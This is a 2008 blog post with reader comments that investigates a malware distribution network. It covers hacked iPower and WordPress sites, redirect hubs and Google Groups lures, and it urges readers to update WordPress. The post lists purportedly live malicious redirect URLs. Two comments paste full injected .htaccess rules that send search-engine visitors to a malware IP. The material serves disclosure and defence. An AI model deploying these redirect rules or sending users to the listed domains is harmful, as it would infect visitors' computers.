?

Log in

No account? Create an account

Previous Entry | Next Entry

More computer crime anatomy

So a while ago, I posted extensively about an underground network of computer virus distributors that I'd uncovered while pursuing American ISP iPower Web about their ongoing, chronic security problems which I first wrote about last December.

It seems that in the brave new world of the Intertubes, crime does pay. It pays very well indeed, in fact. The network I documented earlier has morphed and changed radically in the past few weeks, and become larger and more resilient. In addition, a new attack vector has emerged: attacks on old, outdated versions of WordPress weblog software.

I know that a lot of folks on my flist maintain their own WordPress blogs. Please, please, please, if you run WordPress or know somebody who does, update your WordPress software. It's quick (takes about five minutes) and easy, and all versions of WordPress prior to 2.5 should be considered completely insecure.

In the past couple of weeks, I've noticed a huge surge in WordPress hack attacks, to the point where last Monday there were more hacked WordPress systems than hacked iPower Web sites that were being used to redirect folks to Eastern European virus downloaders. It seems quite likely that the hackers are using automated tools to find and automatically attack old WordPress installs, though one person I've spoken with says he believes his WordPress install was attacked through an insecure FTP username and password that was brute-force guessed as well.

The network that is being used to distribute viruses is being fed from a lot of different sources: hacked iPower sites (of course), hacked WordPress installations, Google Groups set up as malicious redirectors, custom attack domains piggybacked on top of legitimate Web URLs, and hijacked phpBB and phpNuke installs seem to be the most common. For an update on what's going on in the seamy computer underground, and a new map of the computer distribution network:



The updated virus distribution map as it existed last Monday (I've been sick for the last week and a half, so I haven't got 'round to writing this post) looks something like this.



A lot has changed since I constructed the first map. The biggest single difference is there are now a large number of sites that serve the function of www.traffloader.info: they choose a virus dropper at random to redirect a user to.

The network still works in pretty much the same way. The hackers place redirectors on hacked iPower sites, or on hacked WordPress, phpNuke, or phpBB sites, or the hackers hack the DNS entry for a Web site such as www.unicmanila.org (the official United Nations Web site for the Philippines) to add a new record for http://making-gay-porn.unicmanila.org/ (which redirects to one of the traffic handlers that in turn redirects to a virus dropper).

WARNING *** WARNING *** WARNING

Many of the links here and elsewhere in this post are live. As of the time of this writing, they redirect to active virus distributors which can and will infect unpatched Windows computers, and in one case will try to infect Mac computers, with a virus. DO NOT click on these links if you don't know what you're doing. DO NOT allow any of these sites to download or install software onto your computer.




A visitor gets nto the network by doing a Google search, which turns up one of the hackers hacked sites. When he clicks on the Google result, he is sent to a traffic handling Web site. In the past, there was only one of these: traffloader.info, which kept a record of the Google search the user used and would then pick a virus dropper at random to send the user to. Doing this has several advantages: it places an extra step between the hacked Web site and the place where the virus comes from, making it more difficult to trace the source of the infection; and if one virus dropping Web site goes offline or is taken down, traffloader.info will simply start redirecting people to a different virus dropping Web site.

The traffloader.info URL itself, though, is a single point of failure. If traffloader.info is ever taken down (unlikely, since it's hosted in Eastern Europe and registered through crime-friendly, hacker-friendly registrar EST Domains), the whole network fails. And the hackers, apparently, have realized this.

In the past several weeks, many new Web sites have come online that do the same thing that traffloader.info does: they take a visitor, log the Google search the visitor made to get to a hacked site, then send the visitor off to another site that drops a virus. I've found several traffloader.info mirrors that are up and running as of the time of this writing:

traffloader.info/go.php (registrar: estdomains)
traff-mega.net/in.php (registrar: estdomains)
blyapizdets.info/go.php (registrar: estdomains)
kentford.cn/in.php (registered in China; currently using ns1.palaroid.info as name server, which is registered by estdomains)

So traffic comes in through a hacked Web site and goes to one of these sites. From there, it is redirected to one of the virus dropper sites, which have (as the chart above shows) exploded in number.

Some of the hacked WordPress installs don't redirect to a traffic handler site, but instead redirect directly to a virus dropper hosted at sexlookupworld.com directly.

Interestingly, some of the hacked WordPress sites also redirect, not to a virus dropper at all, but to www.cams.com (an affiliate pay-for-access porn Webcam site) or to xml.valary.com (which is a front-end for several pay-per-search search engines). It's possible the hackers responsible for the iPower intrusions and the WordPress hacks are also looking to expand their revenue stream by using the hacked Web sites to redirect to pay-per-search engines and old-fashioned affiliate porn sites. It's also possible that these particular hacks are the work of some other party, who has noticed the vulnerable WordPress installs (or possibly is using the same automated hacking tools that the virus guys are using) to try to piggyback on the WordPress exploits.

Another new twist is poisoned Google Groups. The hackers have set up a large number of Google Groups, which they are advertising by conventional and Weblog spam. These Google Groups have names like

http://groups.google.com/group/orgasm-video/web/free-teen-orgasm-movie
and
http://groups.google.com/group/forced-sex-video/web/free-anal-rape-video
and
http://groups.google.com/group/family-sex-video/web/free-father-daughter-sex-video

Visiting the home page of any of these Google Groups reveals a link to sexlookupworld.com, which (predictably) attempts to install a virus on the visitor's system.

What's also interesting is that the number of payload sites which examine the visitor's browser user-agent and automatically install Mac or Windows malware has not proliferated. As of the time of this writing, I have identified only one site that tries to download Mac malware; the additional new payload sites still download Windows-only malware. I don't know if this means that the hackers have decided the number of Mac users who will infect themselves is too small to pay attention to, or if they simply have had their hands full expanding the network.

The new network is far more resilient than the old network was, and no longer has a single point of failure. It also has a much larger number of inputs, and more ways to trap the unwary into infecting themselves. The explosion of compromised WordPress installs is especially worrisome.

Folks, running software on your own Web server means vigilance. It's the price you pay for getting your own blog--now you own all the security concerns. I cannot stress this enough: If you run software, ANY software, on your server, you MUST be diligent in keeping up with security patches. As of version 2.5, WordPress now automatically notifies you of security updates when you log in to the administrator area. And again, if you are running any version of WordPress prior to 2.5 in any configuration, you should assume you can be pwn3d at will, and that potentially everything on your Web server is up for grabs. The hackers don't even have to target you in specific; judging from the number of compromised WordPress installs I've seen, they simply have to run automated programs that scan the Web searching for insecure WordPress installs.

Even the Boston Public Library's WordPress install has been hacked, and is currently hosting redirectors to virus droppers with URLs such as

http://blog.bpl.org/brls/wp-content/uploads/2007/02/incest-hentai-22_2_08.html

This suggests the attackers have gained full access to the wp-content/uploads directory and can upload HTML files to it at will.

Edit: Mere minutes after posting this, I discovered another source of inputs to the network: compromised, fake, or otherwise dodgy Facebook profiles. Lots and lots and lots of them. Either within the profiles themselves, or within comments on the profile pages, I've seen a very large number of links to sexlookupworld.com.


Comments

( 21 comments — Leave a comment )
phantom_man
May. 5th, 2008 09:25 pm (UTC)
Oddly, I woke up to a nightmare this morning that malware had completely taken over my computer. It was everywhere and there was no getting rid of it.

I don't use wordpress, but I'm going to get very cautious, now.

And, yeah, I know this is a completely weird comment.

Edited at 2008-05-05 10:09 pm (UTC)
feorlen
May. 5th, 2008 11:40 pm (UTC)
So how is this exploiting WP? As I understood it, the security fixes recently were only an issue if you allowed people to create accounts.
eponasr
May. 6th, 2008 02:12 am (UTC)
Thanks for the warning! We're updating tonight.
(Anonymous)
May. 8th, 2008 05:15 pm (UTC)
Franklin - thanks so much for this warning. I understand enough of it that upgrading is now my first priority. I've also linked to this on Twitter.
viviane212
May. 8th, 2008 05:15 pm (UTC)
Franklin - thanks so much for this warning. I understand enough of it that upgrading is now my first priority. I've also linked to this on Twitter.
muse_books
May. 12th, 2008 08:45 am (UTC)
Thank you again for this warning.

One of the communities I am part of called moviebuffs has been receiving posts from a user called video_maniac and narutoadddict (as have other communities) with a link that looks suspiciously like it will lead to a malware site. After my run-in with one of these in March, I'm not clicking to see if it does though. :)
tacit
May. 12th, 2008 04:25 pm (UTC)
I took a look at that community, and yes, you are absolutely right. The messages in that community redirect (through two intermediaries) to a Russian-hosted site that attempts to drop W32/Zlob on the user's computer.
(Anonymous)
Jun. 25th, 2008 10:21 am (UTC)
Gogo.php found on several sites
HI , I have found today several files on my server (Separated accounts) they have being created on a folder "UPLDR" and they are all named gogo.php. THis runs a script that redirects to "remote_host = "http://alojados.com/images/put.php";

Any idea how they get in?

(Anonymous)
Jun. 26th, 2008 04:35 am (UTC)
quite a new system...
this is fascinating, i've never heard of a system like this b4.. and im finding out first hand, my gf's computer has it.. infected

now... how does one clean it all up?
tacit
Jun. 26th, 2008 03:16 pm (UTC)
Re: quite a new system...
If you're on a Mac, there are directions for cleaning it up in the comments above. On a PC, it's more difficult; many PC antivirus software still does not detect Zlob, even though it's been circulating for a long time. If you're running Windows, there are manual removal instructions here.
(Anonymous)
Jul. 21st, 2008 01:21 pm (UTC)
iPowerWeb hacked again
iPowerWeb has been hacked again. My website (www.durangobill.com) is hosted by iPowerWeb. At some point in the last two weeks the following ".htaccess" file showed up in my home folder. What it does is to redirect any incoming search query to a malware site. The malware site will try to infect your computer with something under the guise that it is recommending that you install a security program. I've notified iPowerWeb and Google security about the problem, but at this point the problem is still alive and malicious. Caution - - - The link below connects to malware RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://87.248.180.88/in.html?s=ipw [R,L] Errordocument 404 http://87.248.180.88/in.html?s=ipw_err Caution - - - The link above connects to malware Sincerely, Bill Butler E-mail: lisabill@mydurango.net Website: http://www.durangobill.com (You can go directly to the above website and there isn't a problem. If you go through a major search engine that links to any of my web pages, you will be redirected to the malware website.)
tacit
Jul. 22nd, 2008 07:27 pm (UTC)
Re: iPowerWeb hacked again
Wow. Now that's interesting. Thanks for the update!
(Anonymous)
Jul. 28th, 2008 03:36 pm (UTC)
similar
I too have a site hosted on iPower with a hacked htaccess file. they seem to place the file outside of the webroot, in the hosting root on mine. the first 65 lines of the file are blank followed with the mod-rewrite commands listed. just a warning, the links below appear to go to malware. i've stripped the http:// off the front of the ips to remove the link

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* 87.248.180.88/in.html?s=ipw [R,L]
Errordocument 404 87.248.180.88/in.html?s=ipw_err
(Anonymous)
Aug. 6th, 2008 08:22 pm (UTC)
Is this a server problem?
Hello all! Yesterday i found that my .htaccess had changed, with the same redirection code of the posts above (with 65 empty lines at begin, also).
I've been looking for the bug (xss, http-injection) on my http logs or any unauthotized acces in ftp logs but i can't find anything that changed my .htaccess.
Do you mean this is a server problem and not of one of my php scripts? How can someone to change the .htaccess file whithout logon in the server? How can i avoid this?
tacit
Aug. 6th, 2008 08:34 pm (UTC)
Re: Is this a server problem?
Given the number and severity of the security breaches at iPower, I believe it is a server problem, most likely an exploit within their vDeck platform. It seems to me that any iPower server can be penetrated, even if the particular sites on it do not countain vulnerable PHP scripts or other vulnerabilities.
(Anonymous)
Aug. 7th, 2008 09:15 am (UTC)
Re: Is this a server problem?
Thank you, but my server is Lypha and it uses CPanel... I am so worried about this problem and i don't find where is the bug. Any clue will be welcome.
tacit
Aug. 7th, 2008 03:03 pm (UTC)
Re: Is this a server problem?
Now that is interesting. I haven't seen this kind of attack on ISPs other than iPower, so that's a worrisome development. Do you know what version of cPanel they use?
(Anonymous)
Aug. 8th, 2008 09:03 am (UTC)
Re: Is this a server problem?
CPanel version is 11.23.4-STABLE.
BTW, i've found that my .htacess was uploaded through FTP, according to my hosting support, from an IP of sbcglobal.net (AT&T) provider, in Chicago.
I have changed my FTP password but i don't think this was the problem, since my last password is too long to break with brute force.
(Anonymous)
Aug. 8th, 2008 08:54 pm (UTC)
My server got this same hack...
I too run a CPanel server and one of the clients on my server had this htaccess file installed in the web root. I will have to do some more checking to see where it came from.
(Anonymous)
Aug. 11th, 2008 08:47 pm (UTC)
ipower hacking
I am another hacked site, and am not web saavy enough to know a lot of the technical information, but I AM upset that a copy of my website popped up as a www. address and infected two of my customers. I looked at the source code of this bogus site and it appears that the malware is gone; there is mostly the code I wrote plus an add-on http-equiv line that my webhost put in when they removed the malware. The domain I pay for is simply http://tesselliott.com but a Google search on my name pops up: http://www.tesselliott.com and last week two of my customers got redirected from there to strange places, and found malware on their computers. How is it that my website is in two places at the same time? This may seem like a dumb question, but I am actually proud of being an artist who can deal with the internet and write my own HTML. Am determined to learn what I need to know for security. And thank you for your efforts.
staceybrown281
Feb. 24th, 2010 12:28 am (UTC)
Whoa! Thanks for this factual information.
( 21 comments — Leave a comment )